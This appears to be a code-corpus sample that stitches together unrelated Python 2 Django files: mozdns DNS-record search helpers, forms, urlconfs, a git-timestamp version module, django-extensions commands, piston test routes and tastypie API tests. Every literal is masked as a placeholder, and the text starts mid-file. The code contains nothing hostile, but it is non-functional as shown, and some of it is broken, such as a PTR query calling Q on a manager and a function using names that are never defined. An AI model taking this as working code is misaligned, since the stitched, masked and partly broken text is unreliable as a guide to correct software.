            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:None>', '<STR_LIT:to>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:None>', '<STR_LIT:to>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:description>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'})
        }
    }

    complete_apps = ['<STR_LIT>']
from haystack import indexes
from mozdns.domain.models import Domain


class DomainIndex(indexes.SearchIndex, indexes.Indexable):
    """Haystack search index over ``Domain`` objects.

    ``text`` is the template-rendered document field; ``name`` mirrors the
    model's ``name`` attribute for direct lookups.
    """

    text = indexes.CharField(document=True, use_template=True)
    name = indexes.CharField(model_attr='<STR_LIT:name>')

    def index_queryset(self):
        """Every domain is indexed -- no filtering applied."""
        model = self.get_model()
        return model.objects.all()

    def get_model(self):
        """Model class this index covers."""
        return Domain
from django import forms
from mozdns.mx.models import MX
from mozdns.forms import BaseForm


class MXForm(BaseForm):
    """ModelForm for MX records where the label/domain pair is user-edited."""
    class Meta:
        model = MX
        exclude = ('<STR_LIT>',)
        widgets = {'<STR_LIT>': forms.CheckboxSelectMultiple}


class FQDNMXForm(BaseForm):
    """ModelForm variant for MX records addressed by full FQDN."""
    class Meta:
        model = MX
        exclude = ('<STR_LIT:label>', '<STR_LIT>')
        # NOTE(review): both ``exclude`` and ``fields`` are declared here;
        # Django applies both, with ``exclude`` winning on overlap -- confirm
        # this combination is intentional.
        fields = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:description>')
        widgets = {'<STR_LIT>': forms.CheckboxSelectMultiple}
<s> from django . db . models import Q <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> import mozdns <EOL> import core <EOL> def fqdn_search ( fqdn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _build_queries ( fqdn , * args , ** kwargs ) <EOL> def smart_fqdn_exists ( fqdn , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> search_domain = mozdns . domain . models . Domain . objects . get ( name = fqdn ) <EOL> label = '<STR_LIT>' <EOL> except ObjectDoesNotExist : <EOL> search_domain = None <EOL> if search_domain : <EOL> for type_ , qset in _build_label_domain_queries ( label , search_domain , <EOL> ** kwargs ) : <EOL> if qset . exists ( ) : <EOL> return qset <EOL> search_domain = None <EOL> if len ( fqdn . split ( '<STR_LIT:.>' ) ) == <NUM_LIT:1> : <EOL> return None <EOL> try : <EOL> label = fqdn . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> domain_name = '<STR_LIT:.>' . join ( fqdn . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] ) <EOL> search_domain = mozdns . domain . models . Domain . objects . get ( <EOL> name = domain_name ) <EOL> except ObjectDoesNotExist : <EOL> search_domain = None <EOL> if search_domain : <EOL> for type_ , qset in _build_label_domain_queries ( label , search_domain , <EOL> ** kwargs ) : <EOL> if qset . exists ( ) : <EOL> return qset <EOL> def _build_label_domain_queries ( label , domain , mx = True , sr = True , tx = True , <EOL> cn = True , ar = True , sreg = True , ns = True , ss = True ) : <EOL> qsets = [ ] <EOL> if mx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . mx . models . MX . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if ns : <EOL> if label == '<STR_LIT>' : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . nameserver . models . Nameserver . objects . <EOL> filter ( ** { '<STR_LIT>' : domain } ) ) ) <EOL> if sr : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . srv . models . SRV . objects . 
<EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if tx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . txt . models . TXT . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if ss : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . sshfp . models . SSHFP . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if cn : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . cname . models . CNAME . objects . <EOL> filter ( ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) ) ) <EOL> if ar : <EOL> AddressRecord = mozdns . address_record . models . AddressRecord <EOL> ars = AddressRecord . objects . filter ( <EOL> ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) <EOL> qsets . append ( ( '<STR_LIT>' , ars ) ) <EOL> if sreg : <EOL> StaticReg = core . registration . static . models . StaticReg <EOL> sregs = StaticReg . objects . filter ( <EOL> ** { '<STR_LIT:label>' : label , '<STR_LIT>' : domain } ) <EOL> qsets . append ( ( '<STR_LIT>' , sregs ) ) <EOL> return qsets <EOL> def fqdn_exists ( fqdn , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> for type_ , qset in _build_queries ( fqdn , ** kwargs ) : <EOL> if qset . exists ( ) : <EOL> return qset <EOL> return False <EOL> def _build_queries ( fqdn , dn = True , mx = True , sr = True , tx = True , <EOL> cn = True , ar = True , pt = True , ip = False , sreg = True , <EOL> search_operator = '<STR_LIT>' ) : <EOL> qsets = [ ] <EOL> if dn : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . domain . models . Domain . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if mx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . mx . models . MX . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if sr : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . srv . models . SRV . objects . <EOL> filter ( ** { '<STR_LIT>' . 
format ( search_operator ) : fqdn } ) ) ) <EOL> if tx : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . txt . models . TXT . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if cn : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . cname . models . CNAME . objects . <EOL> filter ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) ) ) <EOL> if ar : <EOL> AddressRecord = mozdns . address_record . models . AddressRecord <EOL> ars = AddressRecord . objects . filter ( Q ( fqdn = fqdn ) | Q ( ip_str = ip ) ) <EOL> qsets . append ( ( '<STR_LIT>' , ars ) ) <EOL> if pt : <EOL> qsets . append ( ( '<STR_LIT>' , mozdns . ptr . models . PTR . objects . <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) | <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : ip } ) ) ) <EOL> if sreg : <EOL> StaticReg = core . registration . static . models . StaticReg <EOL> qsets . append ( ( '<STR_LIT>' , StaticReg . objects . filter ( <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : fqdn } ) | <EOL> Q ( ** { '<STR_LIT>' . format ( search_operator ) : ip } ) ) ) ) <EOL> return qsets </s>
<s> import random <EOL> import string <EOL> from mozdns . create_zone . views import create_zone_ajax <EOL> from django . test import RequestFactory <EOL> def get_post_data ( random_str , suffix ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( random_str , suffix ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> def create_fake_zone ( random_str , suffix = "<STR_LIT>" ) : <EOL> factory = RequestFactory ( ) <EOL> post_data = get_post_data ( random_str , suffix = suffix ) <EOL> request = factory . post ( "<STR_LIT>" , post_data ) <EOL> create_zone_ajax ( request ) <EOL> from mozdns . domain . models import Domain <EOL> return Domain . objects . get ( name = post_data [ '<STR_LIT>' ] ) <EOL> def random_label ( ) : <EOL> """<STR_LIT>""" <EOL> label = '<STR_LIT>' <EOL> for i in range ( random . randint ( <NUM_LIT:5> , <NUM_LIT:30> ) ) : <EOL> label += string . letters [ random . randint ( <NUM_LIT:0> , len ( string . letters ) - <NUM_LIT:1> ) ] <EOL> return label <EOL> def random_byte ( ) : <EOL> """<STR_LIT>""" <EOL> return random . randint ( <NUM_LIT:1> , <NUM_LIT:255> ) </s>
import os
import time
import warnings
import subprocess

# Package version tuple and its dotted-string form.
__version__ = (<NUM_LIT:0>, <NUM_LIT:3>, <NUM_LIT:4>)
VERSION_STRING = '<STR_LIT:.>'.join(str(part) for part in __version__)

# When True, _error() surfaces problems as warnings instead of staying silent.
VERBOSE = False


def _error(msg):
    # Best-effort error reporting: optionally warn, then return a fallback
    # string that is appended to VERSION_STRING in place of a timestamp.
    if VERBOSE:
        warnings.warn(msg)
    return "<STR_LIT>"


def get_commit_timestamp(path=None):
    # Return a formatted UTC timestamp for the latest git commit in *path*
    # (defaults to this file's directory), or _error()'s fallback string on
    # any failure. Python 2 syntax throughout (``except Exception, err``).
    if path is None:
        path = os.path.abspath(os.path.dirname(__file__))
    try:
        process = subprocess.Popen(
            ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"],
            shell=False, cwd=path,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE,
        )
    except Exception, err:
        return _error("<STR_LIT>" % err)
    process.wait()
    returncode = process.returncode
    if returncode != <NUM_LIT:0>:
        # Non-zero exit: report code plus the first line of stdout/stderr.
        return _error(
            "<STR_LIT>"
            "<STR_LIT>"
            "<STR_LIT>"
            % (returncode, process.stdout.readline(), process.stderr.readline())
        )
    output = process.stdout.readline().strip()
    try:
        timestamp = int(output)
    except Exception, err:
        return _error("<STR_LIT>" % output)
    try:
        return time.strftime("<STR_LIT>", time.gmtime(timestamp))
    except Exception, err:
        return _error("<STR_LIT>" % (timestamp, err))


# Module import side effect: append the commit timestamp (or the fallback
# string) to the version string.
VERSION_STRING += get_commit_timestamp()

if __name__ == "<STR_LIT:__main__>":
    print VERSION_STRING
<s> import sys , os <EOL> sys . path . append ( os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , os . pardir ) ) ) <EOL> sys . path . append ( os . path . abspath ( os . path . join ( os . path . dirname ( __file__ ) , os . pardir , os . pardir ) ) ) <EOL> import manage <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> from systems import models <EOL> def main ( ) : <EOL> print '<STR_LIT>' <EOL> for sys in models . System . objects . all ( ) : <EOL> if sys . keyvalue_set . filter ( key = '<STR_LIT>' ) : <EOL> old_hostname = sys . keyvalue_set . filter ( key = '<STR_LIT>' ) [ <NUM_LIT:0> ] . value <EOL> else : <EOL> old_hostname = sys . hostname <EOL> if old_hostname != sys . hostname : <EOL> print '<STR_LIT>' % ( sys . id , old_hostname , sys . hostname ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
from django.conf.urls.defaults import *
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from oncall.views import getoncall, oncall
from models import ServerModel
from misc.generic_views import create_object, gen_mod_dict

# URL routing table. Old-style Django: string view references inside
# ``patterns()`` with the common prefix given as the first argument.
urlpatterns = patterns('<STR_LIT>',
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    (r'<STR_LIT>', '<STR_LIT>'),
    # Direct view callables for the on-call pages.
    url(r'<STR_LIT>', oncall),
    url(r'<STR_LIT>', getoncall),
    # Named routes (reversible via {% url %} / reverse()).
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>', name='<STR_LIT>'),
    # Generic create view parameterized with a model/template dict.
    url(r'<STR_LIT>', create_object, gen_mod_dict(ServerModel,
        '<STR_LIT>'), name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
    url(r'<STR_LIT>', '<STR_LIT>', name="<STR_LIT>"),
)
<s> import os <EOL> from django . core . management . base import CommandError , AppCommand <EOL> from django_extensions . management . utils import _make_writeable <EOL> from optparse import make_option <EOL> class Command ( AppCommand ) : <EOL> option_list = AppCommand . option_list + ( <EOL> make_option ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> make_option ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> ) <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args = "<STR_LIT>" <EOL> label = '<STR_LIT>' <EOL> requires_model_validation = False <EOL> can_import_settings = True <EOL> def handle_app ( self , app , ** options ) : <EOL> directory = os . getcwd ( ) <EOL> app_name = app . __name__ . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:2> ] <EOL> project_dir = os . path . join ( directory , app_name ) <EOL> if not os . path . exists ( project_dir ) : <EOL> try : <EOL> os . mkdir ( project_dir ) <EOL> except OSError , e : <EOL> raise CommandError ( e ) <EOL> copy_template ( '<STR_LIT>' , project_dir , options . get ( '<STR_LIT>' ) , '<STR_LIT>' % options . get ( '<STR_LIT>' ) ) <EOL> def copy_template ( template_name , copy_to , command_name , base_command ) : <EOL> """<STR_LIT>""" <EOL> import django_extensions <EOL> import re <EOL> import shutil <EOL> template_dir = os . path . join ( django_extensions . __path__ [ <NUM_LIT:0> ] , '<STR_LIT>' , template_name ) <EOL> handle_method = "<STR_LIT>" <EOL> if base_command == '<STR_LIT>' : <EOL> handle_method = "<STR_LIT>" <EOL> elif base_command == '<STR_LIT>' : <EOL> handle_method = "<STR_LIT>" <EOL> elif base_command == '<STR_LIT>' : <EOL> handle_method = "<STR_LIT>" <EOL> for d , subdirs , files in os . walk ( template_dir ) : <EOL> relative_dir = d [ len ( template_dir ) + <NUM_LIT:1> : ] <EOL> if relative_dir and not os . path . 
exists ( os . path . join ( copy_to , relative_dir ) ) : <EOL> os . mkdir ( os . path . join ( copy_to , relative_dir ) ) <EOL> for i , subdir in enumerate ( subdirs ) : <EOL> if subdir . startswith ( '<STR_LIT:.>' ) : <EOL> del subdirs [ i ] <EOL> for f in files : <EOL> if f . endswith ( '<STR_LIT>' ) or f . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> path_old = os . path . join ( d , f ) <EOL> path_new = os . path . join ( copy_to , relative_dir , f . replace ( '<STR_LIT>' , command_name ) ) <EOL> if os . path . exists ( path_new ) : <EOL> path_new = os . path . join ( copy_to , relative_dir , f ) <EOL> if os . path . exists ( path_new ) : <EOL> continue <EOL> path_new = path_new . rstrip ( "<STR_LIT>" ) <EOL> fp_old = open ( path_old , '<STR_LIT:r>' ) <EOL> fp_new = open ( path_new , '<STR_LIT:w>' ) <EOL> fp_new . write ( fp_old . read ( ) . replace ( '<STR_LIT>' , command_name ) . replace ( '<STR_LIT>' , base_command ) . replace ( '<STR_LIT>' , handle_method ) ) <EOL> fp_old . close ( ) <EOL> fp_new . close ( ) <EOL> try : <EOL> shutil . copymode ( path_old , path_new ) <EOL> _make_writeable ( path_new ) <EOL> except OSError : <EOL> sys . stderr . write ( style . NOTICE ( "<STR_LIT>" % path_new ) ) </s>
<s> from collections import defaultdict <EOL> import os <EOL> from django . conf import settings <EOL> from django . core . management . base import NoArgsCommand <EOL> from django . db import models <EOL> from django . db . models . loading import cache <EOL> class Command ( NoArgsCommand ) : <EOL> help = "<STR_LIT>" <EOL> def handle_noargs ( self , ** options ) : <EOL> if settings . MEDIA_ROOT == '<STR_LIT>' : <EOL> print "<STR_LIT>" <EOL> return <EOL> media = [ ] <EOL> for root , dirs , files in os . walk ( settings . MEDIA_ROOT ) : <EOL> for f in files : <EOL> media . append ( os . path . abspath ( os . path . join ( root , f ) ) ) <EOL> model_dict = defaultdict ( list ) <EOL> for app in cache . get_apps ( ) : <EOL> model_list = cache . get_models ( app ) <EOL> for model in model_list : <EOL> for field in model . _meta . fields : <EOL> if issubclass ( field . __class__ , models . FileField ) : <EOL> model_dict [ model ] . append ( field ) <EOL> referenced = [ ] <EOL> for model in model_dict . iterkeys ( ) : <EOL> all = model . objects . all ( ) . iterator ( ) <EOL> for object in all : <EOL> for field in model_dict [ model ] : <EOL> target_file = getattr ( object , field . name ) <EOL> if target_file : <EOL> referenced . append ( os . path . abspath ( target_file . path ) ) <EOL> for m in media : <EOL> if m not in referenced : <EOL> print m </s>
from django.conf import settings
from django.core.management import call_command


def main():
    """Configure a minimal standalone Django environment, then run the
    test suite for the target app."""
    config = dict(
        INSTALLED_APPS=[
            '<STR_LIT>',
            '<STR_LIT>',
            '<STR_LIT>',
            '<STR_LIT>',
            '<STR_LIT>',
            '<STR_LIT>',
        ],
        DATABASE_ENGINE='<STR_LIT>',
        DATABASES={
            '<STR_LIT:default>': {
                '<STR_LIT>': '<STR_LIT>',
            }
        },
        MEDIA_ROOT='<STR_LIT>',
        MEDIA_PATH='<STR_LIT>',
        ROOT_URLCONF='<STR_LIT>',
        DEBUG=True,
        TEMPLATE_DEBUG=True,
    )
    settings.configure(**config)
    call_command('<STR_LIT:test>', '<STR_LIT>')


if __name__ == '<STR_LIT:__main__>':
    main()
from django.conf.urls.defaults import *
from piston.resource import Resource
from piston.authentication import HttpBasicAuthentication, HttpBasicSimple
from test_project.apps.testapp.handlers import EntryHandler, ExpressiveHandler, AbstractHandler, EchoHandler, PlainOldObjectHandler, Issue58Handler, ListFieldsHandler, FileUploadHandler, CircularAHandler

# Shared HTTP Basic authenticator used by the authenticated resources below.
auth = HttpBasicAuthentication(realm='<STR_LIT>')

# One piston Resource per handler; the first three require authentication.
entries = Resource(handler=EntryHandler, authentication=auth)
expressive = Resource(handler=ExpressiveHandler, authentication=auth)
abstract = Resource(handler=AbstractHandler, authentication=auth)
echo = Resource(handler=EchoHandler)
popo = Resource(handler=PlainOldObjectHandler)
list_fields = Resource(handler=ListFieldsHandler)
issue58 = Resource(handler=Issue58Handler)
fileupload = Resource(handler=FileUploadHandler)
circular_a = Resource(handler=CircularAHandler)

# Authenticator list for the multi-auth resource: the realm authenticator
# plus one HttpBasicSimple per hard-coded username/password pair.
AUTHENTICATORS = [auth, ]
SIMPLE_USERS = (('<STR_LIT>', '<STR_LIT>'),
                ('<STR_LIT>', '<STR_LIT:user>'),
                ('<STR_LIT>', '<STR_LIT>'),
                ('<STR_LIT>', '<STR_LIT>'))

for username, password in SIMPLE_USERS:
    AUTHENTICATORS.append(HttpBasicSimple(realm='<STR_LIT>',
                                          username=username, password=password))

multiauth = Resource(handler=PlainOldObjectHandler,
                     authentication=AUTHENTICATORS)

# Test-project URL table mapping routes onto the resources above.
urlpatterns = patterns(
    '<STR_LIT>',
    url(r'<STR_LIT>', entries),
    url(r'<STR_LIT>', entries),
    url(r'<STR_LIT>', entries),
    url(r'<STR_LIT>', entries),
    url(r'<STR_LIT>', issue58),
    url(r'<STR_LIT>', expressive),
    url(r'<STR_LIT>', abstract),
    url(r'<STR_LIT>', abstract),
    url(r'<STR_LIT>', echo),
    url(r'<STR_LIT>', fileupload, name='<STR_LIT>'),
    url(r'<STR_LIT>', multiauth),
    url(r'<STR_LIT>', circular_a),
    url(r'<STR_LIT>', '<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>'),
    url(r'<STR_LIT>', '<STR_LIT>'),
    url(r'<STR_LIT>', list_fields),
    url(r'<STR_LIT>', list_fields),
    url(r'<STR_LIT>', popo),
)
import mimeparse


def determine_format(request, serializer, default_format='<STR_LIT:application/json>'):
    """<STR_LIT>"""
    # 1) explicit format query parameter, if the serializer supports it.
    if request.GET.get('<STR_LIT>'):
        if request.GET['<STR_LIT>'] in serializer.formats:
            return serializer.get_mime_for_format(request.GET['<STR_LIT>'])
    # 2) presence flag in the query string.
    # FIX: ``has_key`` is deprecated (removed in Python 3); use ``in``,
    # which QueryDict supports identically.
    if '<STR_LIT>' in request.GET:
        return serializer.get_mime_for_format('<STR_LIT>')
    # 3) content negotiation against the Accept header.
    if request.META.get('<STR_LIT>', '<STR_LIT>') != '<STR_LIT>':
        formats = list(serializer.supported_formats) or []
        # Reversed so later (preferred) formats win ties in best_match.
        formats.reverse()
        best_format = mimeparse.best_match(formats, request.META['<STR_LIT>'])
        if best_format:
            return best_format
    # 4) fall back to the default.
    return default_format


def build_content_type(format, encoding='<STR_LIT:utf-8>'):
    """<STR_LIT>"""
    # A format that already carries a charset parameter passes through as-is.
    if '<STR_LIT>' in format:
        return format
    return "<STR_LIT>" % (format, encoding)
from django.contrib.auth.models import User
from django.http import HttpRequest
from django.test import TestCase
from tastypie.api import Api
from tastypie.exceptions import NotRegistered, BadRequest
from tastypie.resources import Resource, ModelResource


from core.models import Note


class NoteResource(ModelResource):
    # Resource over active notes only.
    class Meta:
        resource_name = '<STR_LIT>'
        queryset = Note.objects.filter(is_active=True)


class UserResource(ModelResource):
    class Meta:
        resource_name = '<STR_LIT>'
        queryset = User.objects.all()


class ApiTestCase(TestCase):
    """Tests for tastypie's ``Api`` registry, URL generation and top-level
    views, exercised through the two resources above."""
    urls = '<STR_LIT>'

    def test_register(self):
        """Registering resources grows the registry; re-registering the same
        resource name is idempotent."""
        api = Api()
        self.assertEqual(len(api._registry), <NUM_LIT:0>)
        api.register(NoteResource())
        self.assertEqual(len(api._registry), <NUM_LIT:1>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>'])
        api.register(UserResource())
        self.assertEqual(len(api._registry), <NUM_LIT:2>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        api.register(UserResource())
        self.assertEqual(len(api._registry), <NUM_LIT:2>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        self.assertEqual(len(api._canonicals), <NUM_LIT:2>)
        # canonical=False must not add another canonical entry.
        api.register(UserResource(), canonical=False)
        self.assertEqual(len(api._registry), <NUM_LIT:2>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        self.assertEqual(len(api._canonicals), <NUM_LIT:2>)

    def test_global_registry(self):
        """Same expectations as test_register on a fresh Api instance."""
        api = Api()
        self.assertEqual(len(api._registry), <NUM_LIT:0>)
        api.register(NoteResource())
        self.assertEqual(len(api._registry), <NUM_LIT:1>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>'])
        api.register(UserResource())
        self.assertEqual(len(api._registry), <NUM_LIT:2>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        api.register(UserResource())
        self.assertEqual(len(api._registry), <NUM_LIT:2>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        self.assertEqual(len(api._canonicals), <NUM_LIT:2>)
        api.register(UserResource(), canonical=False)
        self.assertEqual(len(api._registry), <NUM_LIT:2>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        self.assertEqual(len(api._canonicals), <NUM_LIT:2>)

    def test_unregister(self):
        """Unregistering shrinks the registry; unknown names are a no-op."""
        api = Api()
        api.register(NoteResource())
        api.register(UserResource(), canonical=False)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>', '<STR_LIT>'])
        self.assertEqual(len(api._canonicals), <NUM_LIT:1>)
        api.unregister('<STR_LIT>')
        self.assertEqual(len(api._registry), <NUM_LIT:1>)
        self.assertEqual(sorted(api._registry.keys()), ['<STR_LIT>'])
        self.assertEqual(len(api._canonicals), <NUM_LIT:1>)
        api.unregister('<STR_LIT>')
        self.assertEqual(len(api._registry), <NUM_LIT:0>)
        self.assertEqual(sorted(api._registry.keys()), [])
        # Unregistering an already-absent name must not raise.
        api.unregister('<STR_LIT>')
        self.assertEqual(len(api._registry), <NUM_LIT:0>)
        self.assertEqual(sorted(api._registry.keys()), [])

    def test_canonical_resource_for(self):
        """canonical_resource_for returns the registered instance's class and
        raises NotRegistered after removal."""
        api = Api()
        note_resource = NoteResource()
        user_resource = UserResource()
        api.register(note_resource)
        api.register(user_resource)
        self.assertEqual(len(api._canonicals), <NUM_LIT:2>)
        self.assertEqual(isinstance(api.canonical_resource_for('<STR_LIT>'), NoteResource), True)
        api_2 = Api()
        api.unregister(user_resource._meta.resource_name)
        self.assertRaises(NotRegistered, api.canonical_resource_for, '<STR_LIT>')

    def test_urls(self):
        """The generated urlpatterns include the top-level view plus the
        per-resource includes, for both default and custom api_name."""
        api = Api()
        api.register(NoteResource())
        api.register(UserResource())
        patterns = api.urls
        self.assertEqual(len(patterns), <NUM_LIT:3>)
